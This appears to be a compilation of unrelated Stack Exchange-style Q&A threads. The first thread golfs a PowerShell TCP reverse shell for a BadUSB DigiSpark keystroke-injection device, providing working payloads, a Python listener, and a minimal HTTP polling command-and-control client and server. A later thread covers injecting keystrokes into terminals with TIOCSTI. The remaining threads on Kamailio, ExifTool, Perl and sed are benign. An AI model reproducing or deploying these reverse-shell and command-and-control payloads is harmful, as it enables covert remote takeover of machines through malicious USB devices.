TCP reverse shell on Windows

I am trying to implement a proof-of-concept BadUSB DigiSpark that emulates a HID keyboard and opens a reverse shell using only what ships with Windows (i.e. PowerShell and/or CMD).
What I have found so far:
$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Taken from Week of PowerShell Shells - Day 1.
Despite working, the code above takes too long for the DigiSpark to type out.
Is it possible to create a reverse shell with fewer lines of code?

284 characters. Yes, you can have fewer "lines of code" just by putting them all on one line, and you can't have fewer than one line, so hooray, best case already achieved.
:-| face for not even using the same tricks consistently within the same code, and for not giving any way to test it.
Remove all the semicolons.
Remove the spaces around -ne 0.
Remove -ne 0 entirely, because non-zero numbers cast to true and 0 casts to false.
Use single-character variable names.
Drop port 55555 to 5555.
Change the byte array from
[byte[]]$bt=0..255|%{0}
$b=[byte[]]'0'*256 # does it even need to be initialized to 0? Try without
Nest that into the reading call because who cares if it gets reinitialized every read.
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
#becomes
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
You can call [text.encoding]::ASCII.GetString($b) directly, but why ASCII at all? If it still works when you drop the encoding, then
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
#becomes
$d=-join[char[]]$b
but you're only using that to call iex, so put it there and don't use a variable for it. And do something similar to build the byte array without calling ASCII as well...
... and: 197 chars, 30% smaller:
$t=(new-object Net.Sockets.TCPClient("192.168.254.1",5555)).GetStream()
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
$t.Write(($s=[byte[]][char[]](iex(-join[char[]]$b)2>&1)),0,$s.Length)}
Assuming it works, with no way to test it, it probably won't.
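For the record, testing needs nothing fancier than a plain TCP listener on the other end (nc -lvp 55555 does it). A rough Python sketch, where everything except the port is my assumption:

import socket

# plain TCP listener for the payload to connect back to
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 55555))
srv.listen(1)
conn, addr = srv.accept()
print("connection from", addr)
try:
    while True:
        conn.sendall((input("PS> ") + "\n").encode())
        # a single recv is a simplification; long replies arrive in chunks
        print(conn.recv(65536).decode(errors="replace"))
finally:
    conn.close()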
Edit: I guess if you can change the other side completely, then you could make the client use JSON to communicate back and forth, and run a tight loop of
$u='192.168.254.1:55555';while(1){irm $u -m post -b(iex(irm $u).c)}
and your server would have to have the command ready in JSON like {'c':'gci'} and also accept a POST of the reply...
untested. 67 chars.
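Equally untested: the matching server can stay tiny too. A sketch with Python's http.server (the fixed command, the port, and the print-the-reply behaviour are my assumptions); it answers GET with the JSON {"c": "<command>"} so (irm $u).c works, and accepts the POSTed output:

from http.server import BaseHTTPRequestHandler, HTTPServer
import json

COMMAND = "gci"  # the command handed out to the polling client

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        # serve {"c": "<command>"} so the client's (irm $u).c yields it
        body = json.dumps({"c": COMMAND}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        # the client POSTs the command output back; just print it
        length = int(self.headers.get("Content-Length", 0))
        print(self.rfile.read(length).decode(errors="replace"))
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 55555), Handler).serve_forever()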


Kamailio 4.4 seturi Only Accepts Explicit Strings?

I've been working on implementing the simple serial forking described in the TM module's documentation (the Q values are stored as a priority weight in a MySQL table), where my proxy queries a database to determine which domain to forward to.
I've verified through extensive use of xlog that the variable I'm using to build the new URI for seturi is getting everything correctly. I use an append_branch call in a subsequent while loop iterating over my SQL query results, and that has no problem taking a very similarly formatted parameter. However, when I restart Kamailio, it simply gripes that a string is expected; the line it points at in the console is just the seturi call. I've tried casting as a string, but that doesn't seem to be part of 4.4 (or my syntax is wrong).
I've thought about building the URI strings and storing them in an AVP, but I suspect I'd have the same problem.
For reference, this is what I'm doing:
$var(basedest) = "sip:" + $var(number) + "@" + $(dbr(destination=>[0,0])) + ":" + $var(port);
seturi($var(basedest));
And what it's outputting when trying to load the config:
<core> [cfg.y:3368]: yyerror_at(): parse error in config file //etc/kamailio/kamailio.cfg, line 570, column 9-22: syntax error
<core> [cfg.y:3371]: yyerror_at(): parse error in config file //etc/kamailio/kamailio.cfg, line 570, column 23: bad argument, string expected
Naturally, when I put $var(basedest) in double quotes, it's interpreted literally as a string; single quotes behave similarly. Is there something I can do to work around this? When I feed it an explicit hardcoded string, it's happy as can be and the routing works fine; when I try something very simple like the above, it gets upset. If possible, I'd like to avoid upgrading, as I initially grabbed Kamailio from the yum repo.
Thanks in advance - this has been bugging me a good while.
Apparently this is not a new problem, but I found a workaround.
For reference, seturi and the $ru pseudo-variable refer to the same thing, so basically you'd just do:
$var(mynewru) = "sip:user@domain:5060";
$ru = $var(mynewru);
This achieves what I was originally attempting based on the TM module's documentation. For serial forking, issuing some number of append_branch calls afterwards is fine.

Injecting key combinations into Bash tty using TIOCSTI in Python

I am trying to inject key combinations (like ALT+.) into a tty using the TIOCSTI ioctl in Python.
For some key combinations I have found the corresponding hex code for Bash shells using the following table, which works well.
From this table I can see that for example CTRL+A is '\x01' etc.
import os
import termios, fcntl

# replace xx with a tty number
tty_name = "/dev/pts/xx"
parent_fd = os.open(tty_name, os.O_RDWR)

special_char = "Ctrl_a"
if special_char == "Ctrl_a":
    send_char = '\x01'
if special_char == "Ctrl_e":
    send_char = '\x05'
if special_char == "Ctrl_c":
    send_char = '\x03'

fcntl.ioctl(parent_fd, termios.TIOCSTI, send_char)
But how can I get the hex codes for other combinations, such as ALT+f? I need a full list, or a way to derive this information for any possible combo, as I want to inject most of Bash's shortcuts for moving around, manipulating the history, etc.
Or is there any other way to inject key combinations using TIOCSTI?
Since I can only send single chars to a tty, I wonder if anything else is possible.
Thank you very much for your help!
The usual working of "control codes" is that the "control" modifier subtracts 64 from the character code.
"A" is ASCII character 65, so "Ctrl-A" is "65-64=1".
Is it enough for you to extend this scheme to your situation?
So, if you need the control code for, for example, "Device Control 4" (ASCII code 20), you'd add 64, to obtain "84", which is "T".
Therefore, the control-code for DC4 would be "Control+T".
In the reverse direction, the value for "Control+R" (history search in Bash) is R-64, so 82-64=18 (Device Control 2).
ASCIItable.com can help with a complete listing of all character codes in ASCII
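As a sketch, that rule plugged into your injection code (Python 3 here, so the character is passed as bytes; the pts path is an example):

import os, termios, fcntl

def ctrl(letter):
    # the rule above: the control code is the character code minus 64
    return bytes([ord(letter.upper()) - 64])

# e.g. inject Ctrl+R (0x12, Device Control 2) into a tty
fd = os.open("/dev/pts/3", os.O_RDWR)
fcntl.ioctl(fd, termios.TIOCSTI, ctrl("r"))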
Update: Since you were asking specifically for "alt+.":
The "Control means minus 64" rule doesn't apply to Alt, unfortunately; that seems to be handled completely differently, by the keyboard driver, which generates "key codes" (also called "scancodes", variably written with or without a space) that don't necessarily map to ASCII. (Keycodes just happen to map to ASCII for 0-9 and A-Z, which leads to much confusion.)
This page lists some more keycodes, including "155" for "alt+."

Increment Serial Number using EXIF

I am using ExifTool to change the camera body serial number to a unique serial number for each image in a group of images numbering several hundred. The camera body serial number is used as a second place to store the image's serial number, in addition to IPTC, since it takes a little more effort to remove.
The serial number is in the format ###-###-####-####, where the last four digits are the number to increment. The first three groups of digits do not change within a batch; I only need to increment the last group.
EXAMPLE
If I have 100 images in my first batch, they would be numbered:
811-010-5469-0001, 811-010-5469-0002, 811-010-5469-0003 ... 811-010-5469-0100
I can successfully drag a group of images onto my ExifTool Shortcut that has the values
exiftool(-SerialNumber='001-001-0001-0001')
and it will change the Exif SerialNumber tag on the images, but I have not been successful in figuring out what to add to make it increment for each image.
I have tried variations on the below without success:
exiftool(-SerialNumber+=001-001-0001-0001)
exiftool(-SerialNumber+='001-001-0001-0001')
I realize ExifTool is most likely seeing the first line as numbers being subtracted and the second line as a string. I have also tried:
exiftool(-SerialNumber+='1')
exiftool(-SerialNumber+=1)
just to see if I can even get it to increment with a basic, single-digit number. This has not worked either.
Maybe this cannot be incremented this way and I need to use ExifTool from the command line. If so: I am learning the command line/PowerShell (Windows) but am still weak in this area, and would appreciate some pointers to get started if that is the route I need to take. I am also learning Linux and could do this project from there instead. Either way, I am not afraid of the command line; I would just need a bit more hand-holding than normal for a starting point.
I program in PHP, JavaScript and other languages, so code is not foreign to me; I just lack experience writing it for the command line.
If further clarification is needed, please let me know in the comments.
Your help and guidance is appreciated!
You'll probably have to go to the command line rather than rely upon drag and drop, as this command relies upon ExifTool's advanced formatting feature.
Exiftool "-SerialNumber<001-001-0001-${filesequence;$_=sprintf('%04d', $_+1 )}" <FILE/DIR>
If you want to be more general purpose and to use the original serial number in the file, you could use
Exiftool "-SerialNumber<${SerialNumber}-${filesequence;$_=sprintf('%04d', $_+1 )}" <FILE/DIR>
This will just add the file count to the end of the current serial number in the image, though if you have images from multiple cameras in the same directory, that could get messy.
As for using the command line, you just need to rename the executable to remove the commands in the parentheses, and then either move it to someplace in the command line's path or use the full path to ExifTool.
As for clarification on your previous attempts: the += option is used with numbers and with lists. The SerialNumber tag is usually a string, though that could depend upon where it's being written.
If I understand your question correctly, something like this should work:
1..100 | % {
    $sn = '811-010-5469-{0:D4}' -f $_
    # apply $sn to the Nth image here
}
or like this (if you iterate over files):
$i = 1
Get-ChildItem 'C:\some\folder' -File | % {
    $sn = '811-010-5469-{0:D4}' -f $i
    # update the EXIF data of the current file with $sn, e.g.:
    # exiftool "-SerialNumber=$sn" $_.FullName
    $i++
}

difference between iterating lines with while and array assignment

I'm writing a perl script that reads a file into an array. I wrote the program on Windows, using Perl 5.16 (it also works on 5.14), and the script failed using a Mac with Perl 5.12.
The part that failed is this: my @array = <$file>. On the Mac, the array came back the correct size (same as number of lines in the file), but every element except the last one was empty. The code worked correctly when I switched to this instead:
my @array;
while (<$file>) {
    push @array, $_;
}
I'm not sure whether it would have made a difference if I had switched the line endings to LF instead of CRLF (Windows style). Though the problem is fixed, it leaves me puzzled: I thought those two code snippets were exactly the same thing. What difference between them produces different results here?
The answer is that the two methods are exactly equivalent, as you suspected. Example:
my $start = tell DATA;    # store beginning filehandle position
my @array1 = <DATA>;
seek DATA, $start, 0;     # reset filehandle position
my @array2;
while (<DATA>) {
    push @array2, $_;
}
print "List assignment:\n @array1\n";
print "Looping through:\n @array2\n";
__DATA__
1
2
foo
bar
Your previous failure was likely something else. Perhaps some sort of problem with Perl on the Mac or the Mac's file IO was involved, but more likely it was some other part of your code (by this I mean nothing personal: I would make the same assumption about my own code).

sed optimization (large file modification based on smaller dataset)

I have to deal with very large plain text files (over 10 gigabytes; yeah, I know it depends on what we should call large), with very long lines.
My most recent task involves some line editing based on data from another file.
The data file (the one to be modified) contains 1,500,000 lines, each about 800 chars long. Each line is unique and contains only one identity number, and each identity number is unique.
The modifier file is e.g. 1800 lines long; each line contains an identity number plus an amount and a date that should be modified in the data file.
I just transformed the modifier file (with Vim regexes) into a sed script, but it's very inefficient.
Let's say I have a line like this in the data file:
(some 500 characters)id_number(some 300 characters)
And I need to modify data in the 300 char part.
Based on the modifier file, I come up with sed lines like this:
/id_number/ s/^\(.\{650\}\).\{20\}/\1CHANGED_AMOUNT_AND_DATA/
So I have 1800 lines like this.
But I know that even on a very fast server, if I do a
sed -i.bak -f modifier.sed data.file
it's very slow, because it has to test every pattern against every line.
Isn't there a better way?
Note: I'm not a programmer, and have never studied algorithms in school.
I can use awk, sed, and an outdated version of Perl on the server.
My suggested approaches (in order of desirability) would be to process this data as:
A database (even a simple SQLite-based DB with an index will perform much better than sed/awk on a 10GB file)
A flat file containing fixed record lengths
A flat file containing variable record lengths
Using a database takes care of all those little details that slow down text-file processing (finding the record you care about, modifying the data, storing it back). Take a look at DBD::SQLite in the case of Perl.
If you want to stick with flat files, you'll want to maintain an index manually alongside the big file so you can more easily look up the record numbers you'll need to manipulate. Or, better yet, perhaps your ID numbers are your record numbers?
If you have variable record lengths, I'd suggest converting to fixed record lengths (since it appears only your ID is variable length). If you can't do that, will the existing data at least never move around in the file? Then you can maintain the previously mentioned index and add new entries as necessary, with the difference that instead of pointing to a record number, the index now points to the absolute position in the file.
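To make the database route concrete, here is a hedged sketch using Python's sqlite3 for brevity (DBD::SQLite in Perl works the same way); the file names, the 10-char ID at offset 500, and the table layout are all assumptions:

import sqlite3

def extract_id(line):
    # assumption: a 10-char ID at a fixed offset, per the question's
    # "(some 500 characters)id_number(some 300 characters)" layout
    return line[500:510]

con = sqlite3.connect("records.db")
con.execute("CREATE TABLE IF NOT EXISTS records (id TEXT PRIMARY KEY, line TEXT)")

# one-time import of the big data file
with open("data.file") as f:
    con.executemany(
        "INSERT OR REPLACE INTO records VALUES (?, ?)",
        ((extract_id(line), line) for line in f),
    )
con.commit()

def apply_modification(con, rec_id, new_tail):
    # each change is one indexed UPDATE instead of a full-file scan;
    # substr keeps the first 510 chars (500 prefix + 10-char ID)
    con.execute(
        "UPDATE records SET line = substr(line, 1, 510) || ? WHERE id = ?",
        (new_tail, rec_id),
    )
    con.commit()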
I suggest a program written in Perl (I am not a sed/awk guru and I don't know exactly what they are capable of).
Your algorithm is simple: first of all, construct a hashmap that gives you the new data string to apply for each ID. This is achieved by reading the modifier file, of course.
Once this hashmap is populated, you can browse each line of your data file, read the ID in the middle of the line, and generate the new line as you've described above.
I am not a Perl guru either, but the program should be quite simple. If you need help writing it, ask for it :-)
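A minimal sketch of that idea in Python (the file names, the tab-separated modifier layout, the fixed 10-char ID at offset 500, and replacing the whole tail are all assumptions):

# build the ID -> replacement map from the modifier file
mods = {}
with open("modifier_file.txt") as mf:
    for line in mf:
        rec_id, replacement = line.rstrip("\n").split("\t", 1)
        mods[rec_id] = replacement

# stream the data file, patching the tail of every line whose ID is known
with open("data.file") as df, open("data.file.new", "w") as out:
    for line in df:
        rec_id = line[500:510]
        if rec_id in mods:
            line = line[:510] + mods[rec_id] + "\n"
        out.write(line)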
With Perl you should use substr to get the id_number, especially if it has a constant width:
my $id_number = substr($str, 500, $id_number_length);
After that, if $id_number is one of the IDs to modify, use four-argument substr to replace the remaining text:
substr($str, -300, 300, $new_text);
Perl's regular expressions are very fast, but not in this case.
My suggestion is: don't use a database. A well-written Perl script will outperform a database by an order of magnitude at this sort of task. Trust me, I have a lot of practical experience with it. You will not even have finished importing the data into a database by the time the Perl script is done.
1,500,000 lines of 800 chars comes to about 1.2 GB. On a very slow disk (30 MB/s) you will read it in about 40 seconds; at 50 MB/s it takes 24 s, at 100 MB/s 12 s, and so on. But Perl hash lookup (like a DB join) speed on a 2 GHz CPU is above 5M lookups/s, so the CPU-bound work will take seconds while the IO-bound work takes tens of seconds. If it is really 10 GB the numbers change, but the proportion stays the same.
You have not specified whether the modification changes the data's size (i.e. whether it can be done in place), so we will not assume it can, and will work as a filter. You also have not specified the format of your "modifier file" or what sort of modification you need. Assume it is tab-separated, something like:
<id><tab><position_after_id><tab><amount><tab><data>
We will read data from stdin and write to stdout; the script can be something like this:
my $modifier_filename = 'modifier_file.txt';

open my $mf, '<', $modifier_filename or die "Can't open '$modifier_filename': $!";
my %modifications;
while (<$mf>) {
    chomp;
    my ($id, $position, $amount, $data) = split /\t/;
    $modifications{$id} = [$position, $amount, $data];
}
close $mf;

# make matching regexp (use quotemeta to escape regexp-meaningful characters)
my $id_regexp = join '|', map quotemeta, keys %modifications;
$id_regexp = qr/($id_regexp)/;    # compile regexp

while (<>) {
    next unless m/$id_regexp/;
    next unless $modifications{$1};
    my ($position, $amount, $data) = @{$modifications{$1}};
    substr $_, $+[1] + $position, $amount, $data;
}
continue { print }
On my laptop it takes about half a minute for 1.5 million rows, 1800 lookup IDs, and 1.2 GB of data. For 10 GB it should not take over 5 minutes. Is that reasonably quick for you?
If you start to think you are not IO bound (for example, if the data lives on a NAS) but CPU bound, you can sacrifice some readability and change to this:
my $mod;
while (<>) {
    next unless m/$id_regexp/;
    $mod = $modifications{$1};
    next unless $mod;
    substr $_, $+[1] + $mod->[0], $mod->[1], $mod->[2];
}
continue { print }
You should almost certainly use a database, as MikeyB suggested.
If you don't want to use a database for some reason, and if the list of modifications fits in memory (as it currently does at 1800 lines), the most efficient method is a hash table populated with the modifications, as suggested by yves Baumes.
If you get to the point where even the list of modifications becomes huge, you need to sort both files by their IDs and then perform a list merge (see the sketch after this list). Basically:
Compare the ID at the "top" of the input file with the ID at the "top" of the modifications file
Adjust the record accordingly if they match
Write it out
Discard the "top" line from whichever file had the (alphabetically or numerically) lowest ID and read another line from that file
Goto 1.
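A hedged sketch of that merge in Python; both inputs must already be sorted by ID, and the tab-separated layout plus the behaviour of apply_mod are illustrative assumptions:

def apply_mod(line, mod):
    # hypothetical: replace everything after the ID with the mod's payload
    rec_id, _ = line.split("\t", 1)
    return rec_id + "\t" + mod.split("\t", 1)[1]

def merge(data_file, mods_file, out):
    mods = iter(mods_file)
    mod = next(mods, None)
    for line in data_file:
        rec_id = line.split("\t", 1)[0]
        # discard modification lines whose ID sorts below the current record
        while mod is not None and mod.split("\t", 1)[0] < rec_id:
            mod = next(mods, None)
        if mod is not None and mod.split("\t", 1)[0] == rec_id:
            line = apply_mod(line, mod)   # adjust the record if the IDs match
        out.write(line)                   # write it out either way

# e.g.: merge(open("data.sorted"), open("mods.sorted"), open("data.new", "w"))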
Behind the scenes, a database will almost certainly use a list merge if you perform this alteration using a single SQL UPDATE command.
